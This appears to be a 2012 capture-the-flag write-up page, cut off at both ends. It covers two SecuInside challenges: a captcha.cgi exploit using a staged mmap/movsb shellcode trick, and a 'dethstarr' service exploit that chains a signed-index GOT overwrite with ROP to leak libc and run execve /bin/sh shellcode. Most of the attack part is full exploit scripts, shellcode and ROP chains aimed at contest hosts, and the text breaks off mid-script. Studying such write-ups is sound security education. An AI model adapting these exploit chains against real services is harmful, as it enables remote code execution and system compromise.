/* ... */ if (use_malloc) { buf = malloc(0x1000u); /* ... */ } else { buf = mmap(0, 0x1000u, mmap_flag, 0, 0); /* ... */ } /* ... */ sprintf(buf, "[%s][%s][%s]\n\n", remote_addr, remote_port, user_agent); /* ... */ if (!*ptr_to_t_s && *somewhere) { jmp(0); return -1; } /* ... */
Our goal is to trigger the
mmap
with the following flags:MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS
and then to use thejmp(0)
in order to execute our mapped page.The page have to contain valid code. We only control the three pointers
remote_addr
,remote_port
anduser_agent
, used by thesprintf
call ([
ispop ebx
and]
ispop ebp
).We needed to find null terminated gadget that would be concatenated.
When we jump to
0x0
the registers have the following values:esi = 0xffffd011 = pointer to v edi = 0
We then searched for a
movsb
gadget and found anmovsb
followed byjmp $ - 4
hidden in alea esp, [ebp-244h]
:$ rasm2 -d 8da57cfdffff lea esp, [ebp+0xfffffd7c] $ rasm2 -d a57cfd movsd jl 0x8048000
As rasm2’s start address is 0x08048000, we can see that this produces a movsb infinite loop that copies our v buffer to 0x0, until the movsb loop itself gets overwritten. Our stage2 shellcode is located in the v buffer at offset 0x8. The jmp $ - 4 is replaced by a jmp 0x8, which executes our shellcode.
We put this gadget in our user_agent and junk (but valid) code in remote_addr and remote_port in order to reserve some space for our stage2 shellcode.
Before:
(gdb) x/17i 0 => 0x0: pop ebx ; [ 0x1: nop ; junk 0x2: nop 0x3: nop 0x4: push ebp 0x5: mov ebp,esp 0x7: cmp DWORD PTR ds:0x804afa4,0x5d ; ] is eaten by cmp 0xe: pop ebx ; [ 0xf: nop ; junk 0x10: nop 0x11: nop 0x12: push ebp 0x13: mov ebp,esp 0x15: cmp DWORD PTR ds:0x804afa4,0x5d ; ] is eaten by cmp 0x1c: pop ebx ; [ 0x1d: movs DWORD PTR es:[edi],DWORD PTR ds:[esi] 0x1e: jl 0x1d
After:
(gdb) x/17i 0 0x0: popa ; v[0] = 'a' 0x1: popa ; v[1] = 'a' 0x2: popa ; v[2] = 'a' 0x3: popa ; v[3] = 'a' 0x4: popa ; v[4] = 'a' 0x5: popa ; v[5] = 'a' 0x6: popa ; v[6] = 'a' 0x7: popa ; v[7] = 'a' 0x8: xor ecx,ecx ; stage2 shellcode 0xa: inc ecx 0xb: shl ecx,0x5 0xe: sub di,0x8 0x12: add si,0x19 0x16: rep movs BYTE PTR es:[edi],BYTE PTR ds:[esi] 0x18: nop 0x19: nop 0x1a: nop 0x1b: nop 0x1c: nop 0x1d: nop => 0x1e: jmp 0x8
Here is the stack we crafted:
null = struct.pack("<I", 0x0804897f) nops = struct.pack("<I", 0x080488bd) movs_jmp = struct.pack("<I", 0x0804963d) jmp_arg0 = struct.pack("<I", 0x08049648) MAP_PRIVATE = 0x02 MAP_FIXED = 0x10 MAP_ANONYMOUS = 0x20 mmap_flag = struct.pack("B", MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS) v = captcha # v[0:8] v += stage2 # v[8:28] v += (30 - len(v)) * b'\x90' # nop padding v += yasm("jmp $ - 22") # v[28:32] = b"\xeb\xe8" v += movs_jmp # v[32:36] user_agent v += null # v[36:40] v += nops # v[40:44] remote_port v += jmp_arg0 # v[44:48] v += nops # v[48:52] remote_addr v += b"\x01" * 3 # v[52:55] v += mmap_flag # v[55:56]
Stage 2 - Copy our full shellcode
Our
stage2
is very simple, when we jump back to0x8
we have theQUERY_STRING
pointer inesi
.stage2 = yasm(""" BITS 32 xor ecx, ecx inc ecx shl ecx, 5 ; 0x100 sub di, 8 add si, 25 rep movsb """)
Stage 3 - Free pwn
We put our full length
stage3
shellcode at the end of our query:http://61.42.25.20/captcha/captcha.cgi?q=sent&v=<captcha>&t_s=<timestamp>&<stage3>
For example, a simple
ls
:ls = yasm(""" BITS 32 xor ecx, ecx mul ecx push ecx push 0x736c2f2f ;; sl// push 0x6e69622f ;; nib/ mov ebx, esp push ecx push ebx mov ecx, esp mov al, 11 int 0x80 """)
Full exploit
#!/usr/bin/python3
"""Local reproduction of the kielbasa (captcha.cgi) exploit.

Builds the overflowing ``v`` parameter, appends the final payload to the
query string and runs ./captcha.cgi with the CGI environment set.
"""
import os
import struct
from asm import yasm

# Stage 2: small copy loop placed inside v.
# NOTE: the "; 0x100" asm comment below is off: 1 << 5 leaves 0x20 in ecx.
stage2 = yasm("""
BITS 32
xor ecx, ecx
inc ecx
shl ecx, 5 ; 0x100
sub di, 8
add si, 25
rep movsb
""")

# Example final payload: execve of /bin//ls.
ls = yasm("""
BITS 32
xor ecx, ecx
mul ecx
push ecx
push "//ls" ;; sl//
push "/bin" ;; nib/
mov ebx, esp
push ecx
push ebx
mov ecx, esp
mov al, 11
int 0x80
""")

# The original script appended an undefined name (exit42) to the query,
# which raised NameError. Use the payload that is actually assembled above.
stage3 = ls

# Addresses inside the binary that overwrite the sprintf() arguments and
# the neighbouring pointers.
nops = struct.pack("<I", 0x080488BD)
movs_jmp = struct.pack("<I", 0x0804963d)
null = struct.pack("<I", 0x0804897f)
jmp_arg0 = struct.pack("<I", 0x08049648)

MAP_PRIVATE = 0x02
MAP_FIXED = 0x10
MAP_ANONYMOUS = 0x20
mmap_flag = struct.pack("B", MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS)

# Overlong t_s made only of '9' characters.
t_s = b"9999999999999999999999999999999999999"
captcha = b"a" * 8

v = captcha
v += stage2
v += (30 - len(v)) * b'\x90'  # nop padding
v += yasm("jmp $ - 22")
v += movs_jmp  # USER_AGENT
v += null
v += nops  # REMOTE_PORT
v += jmp_arg0
v += nops  # REMOTE_ADDR
v += b"\x01" * 3  # padding
v += mmap_flag

env = b'REMOTE_ADDR=192.168.103.61 REMOTE_PORT=80 REQUEST_METHOD="GET" '\
      b'HTTP_USER_AGENT="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"'
query = b"q=sent&t_s=" + t_s + b"&v=" + v + b"&" + stage3
os.system(env + b' QUERY_STRING="' + query + b'" ./captcha.cgi')
My
asm.py
tool:```python #!/usr/bin/env python3
LSE - Rémi Audebert - 2012
import sys import tempfile import subprocess
def yasm(code):
    """Assemble x86 code with yasm

    The source text is fed to yasm on stdin and the flat binary it writes
    is returned as bytes.

    Raises subprocess.CalledProcessError if yasm exits with a non-zero
    status, instead of silently returning whatever the output file holds.

    >>> yasm("int 0x80")
    b'\\xcd\\x80'
    """
    with tempfile.NamedTemporaryFile() as output_file:
        p = subprocess.Popen(['/usr/bin/yasm',
                              '-fbin',  # raw output
                              '-o', output_file.name,
                              '-'],  # read the source from stdin
                             stdin=subprocess.PIPE)
        p.communicate(code.encode())
        if p.returncode != 0:
            raise subprocess.CalledProcessError(p.returncode, p.args)
        # yasm wrote to the file by name; our handle is still at offset 0.
        return output_file.read()
def cstring(data):
    """Convert bytes to the body of a C string literal

    Every byte is written as a two-digit ``\\xNN`` escape, so values below
    0x10 keep a fixed width (``\\x0a`` rather than ``\\xa``).

    >>> cstring(bytearray([0xcd, 0x80]))
    '\\\\xcd\\\\x80'
    """
    return "".join("\\x%02x" % c for c in data)
# Run the doctests when the module is executed as a script.
if __name__ == "__main__":
    import doctest
    doctest.testmod()
SecuInside2K12 Prequals: dethstarr writeup
Dethstarr was one of my favorite service exploitation challenges during the SecuInside 2012 contest. We had to fully reverse a given binary to understand how the protocol it implements works. To be able to debug the binary easily and in the same environment as on the remote server, we setup xinetd on a CentOS 6.2 Virtual Machine with the following configuration:
service dethstarr { socket_type = stream wait = no flags = REUSE user = w4kfu server = /home/w4kfu/LSE/CTF/SecuInside_2012/dethstarr/dethstarr port = 4242 type = UNLISTED }
To trigger the bug, we have to understand how the protocol works in detail. Looking at the disassembled code, we can figure out 4 different functions that will first read a certain number of bytes, check if it matches several conditions, then read again on the socket with a user specified size (limited to avoid buffer overflows).
First check function
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | 0xCA | 0x0 | 0x1 | 0xAC | 0x9A | 0x1 | 0x0 | 0x00010001| 0x54534e49 | 0x1F | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | 0xCA | 0x0 | 0x1 | 0xAC | 0x9A | 0x1 | 0x0 | 0x00010001| 0x54534e49 | 0x1F | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
The last 0x1F is the size for the last
read
call of that function (no overflow can occur)Second check function
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | 0x8 | 0x1 | 0x1 | 0x0DFE1ABCC | <global_var> | 0x1 | 0xFF| -42 | 0x66| 0x756C| 0xFF| 0x60|0x7FFFFFFF |0x9C |0x1F| +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
The
global_var
is set before each call to the check function.Third check function
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | 0x001A00CB|0x000200DB |0x41420019 |0x6|0x1|0xCA |0xCCCCCCCC | <global_var> | 0x1F| +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Fourth check function
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | <addr>| 0x31323301|<index>|<index>|0x9|0x9|0x1|0xFFFF|0xFFFF0000|0x4|0x00e10052 |<global_var> |0x1F | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Inside this fourth check function lies the vulnerability of this challenge: the index field (
[eax+8]
) is tested to be under0x1F
using a signed compare, which allows negative values:.text:080488EE mov eax, [eax+8] .text:080488F1 cmp eax, 1Fh .text:080488F4 jle short loc_8048909 .text:0804893A mov eax, [eax+8] .text:0804893D mov edx, [ebp+buf] .text:08048940 mov edx, [edx] .text:08048942 mov ds:dword_804A8E0[eax*4], edx
Using this we are able to dereference a negative offset inside a global array and write anything we want in it. I choose to rewrite the
exit()
function address from inside the GOT. Then, when the check function called after this vulnerability fails, it will fail callingexit
and jump to the address we specified. The binary contains a nice function epilogue we can use to overflow one of the program’s buffer:.text:08049518 mov [esp+8], eax ; nbytes .text:0804951C lea eax, [ebp+var_31] .text:0804951F mov [esp+4], eax ; buf .text:08049523 mov dword ptr [esp], 0 ; fd .text:0804952A call _read .text:0804952F mov eax, 0 .text:08049534 .text:08049534 end_function: ; CODE XREF: first_check_buff+65j .text:08049534 ; first_check_buff+8Cj ... .text:08049534 add esp, 44h .text:08049537 pop ebx .text:08049538 pop ebp .text:08049539 retn
The interesting thing is that the exit function is triggered with
eax
being the invalid size we specified (making the check fail). That means we control this register value, which is used as theread
size.After triggering this bug, we can start using ROP to build a shellcode that will bypass ASLR and NX. The shellcode will leak an address from the GOT to allow us to locate
libc.so.6
in memory and build a second stage shellcode using this additional information.First stage ROP chain
0x080495B2 # add esp, 0x1C ; pop ; pop ; pop ; pop ; ret 0x41424344 # Dummy 0x08049515 # Addres inside First check before read
Now we have the size we want in eax, which allow us to create a buffer overflow when
read
is called inside 0x0804928D (a.k.a first check function).Second stage ROP chain
0x080483C4 # Address of the write function in .plt 0x08048DDA # Return Address Second check mov ebp, esp 0x00000001 # File descriptor (stdout) 0x0804A7BC # Address we want to write from: read@.got.plt 0x00000004 # Size of the write
Now that we have the
read
address from the GOT, weret
again on the second check function (it is similar to the first stage ROP chain) and re-trigger the buffer overflow to prepare for stage 3.Third stage ROP chain
<write_addr> + 0xca60 # Computed address of mmap (libc.so.6) 0x080495B2 # add esp, 1C ; pop ; pop ; pop ; pop ; ret // clean mmap args 0x13370000 # Address to map 0x00001000 # Size to map 0x00000007 # RWX 0x00000031 # MAP_FIXED | MAP_SHARED | MAP_ANONYMOUS 0xffffffff # fd 0x00000000 # offset (ignored) ... DUMMY * 20 ... 0x080483F4 # read@.plt 0x13370000 # Return adress: our shellcode 0x00000000 # fd 0x13370000 # Address to read to len(shellcode) # Length of shellcode
This ROP chain will call
mmap
to a fixed address and read our shellcode (execve /bin/sh
) and jump to it.Finally this exploit works well both locally and remotely, and we were able to get the flag in the
/home/dethstarr/key
file. Later on we also used this exploit to get the system time of the server (usingdate
) in order to synchronize ourself with theclassico
service challenge.Here is the final exploit:
import socket import struct import sys s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #s.connect(("61.42.25.25", 8282)) s.connect(("192.168.103.61", 4242)) def first_check(): cmd = struct.pack("<I", 0xCA) cmd += struct.pack("<I", 0x0) cmd += struct.pack("<I", 0x1) cmd += struct.pack("<I", 0xAC) cmd += struct.pack("<I", 0x9A) cmd += struct.pack("<I", 0x1) cmd += struct.pack("<I", 0x00000000) cmd += struct.pack("<I", 0x00010001) cmd += struct.pack("<I", 0x54534e49) cmd += struct.pack("<I", 0x1F) #sys.stdout.write(cmd) s.send(cmd) cmd = "A" * (0x1F) #sys.stdout.write(cmd) s.send(cmd) def second_check(x, size, cmd2, a): cmd = struct.pack("<I", a) cmd += struct.pack("<I", 0x41424344) cmd += struct.pack("<I", 0x41424344) cmd += struct.pack("<I", 0x0DFE1ABCC) # Switch case cmd += struct.pack("<I", x) cmd += struct.pack("<I", 0x41424344) cmd += struct.pack("<I", 0xFF) cmd += struct.pack("<i", -0x42) cmd += struct.pack("<I", 0x66) cmd += struct.pack("<I", 0x756C) cmd += struct.pack("<I", 0xFF) cmd += struct.pack("<I", 0x60) cmd += struct.pack("<I", 0x41424344) cmd += struct.pack("<I", 0x7FFFFFFF) cmd += struct.pack("<I", 0x9C) cmd += struct.pack("<I", size) #sys.stdout.write(cmd) s.send(cmd) #sys.stdout.write(cmd) s.send(cmd2) def third_check(): for i in [1, 0, 2]: cmd = struct.pack("<I", 0x001A00CB) cmd += struct.pack("<I", 0x000200DB) cmd += struct.pack("<I", 0x41420019) cmd += struct.pack("<I", 0x6) cmd += struct.pack("<I", 0x41424344) cmd += struct.pack("<I", 0xCA) cmd += struct.pack("<I", 0xCCCCCCCC) # index cmd += struct.pack("<I", i) cmd += struct.pack("<I", 0x1F) #sys.stdout.write(cmd) s.send(cmd) cmd = "A" * (0x1F) #sys.stdout.write(cmd) s.send(cmd) def fourth_check(x, y, addr): cmd = struct.pack("<I", addr) cmd += struct.pack("<I", 0x31323301) cmd += struct.pack("<i", y) cmd += struct.pack("<i", y) cmd += struct.pack("<I", 0x9) cmd += struct.pack("<I", 0x9) cmd += struct.pack("<I", 0x1) cmd += struct.pack("<I", 65535) cmd += struct.pack("<i", -65536) cmd += 
struct.pack("<I", 0x4) cmd += struct.pack("<I", 0x00e10052) # index !! cmd += struct.pack("<I", x) cmd += struct.pack("<I", 0x1F) #sys.stdout.write(cmd) s.send(cmd) cmd = "A" * 0x1F s.send(cmd) first_check() print s.recv(0x60) #raw_input() for x in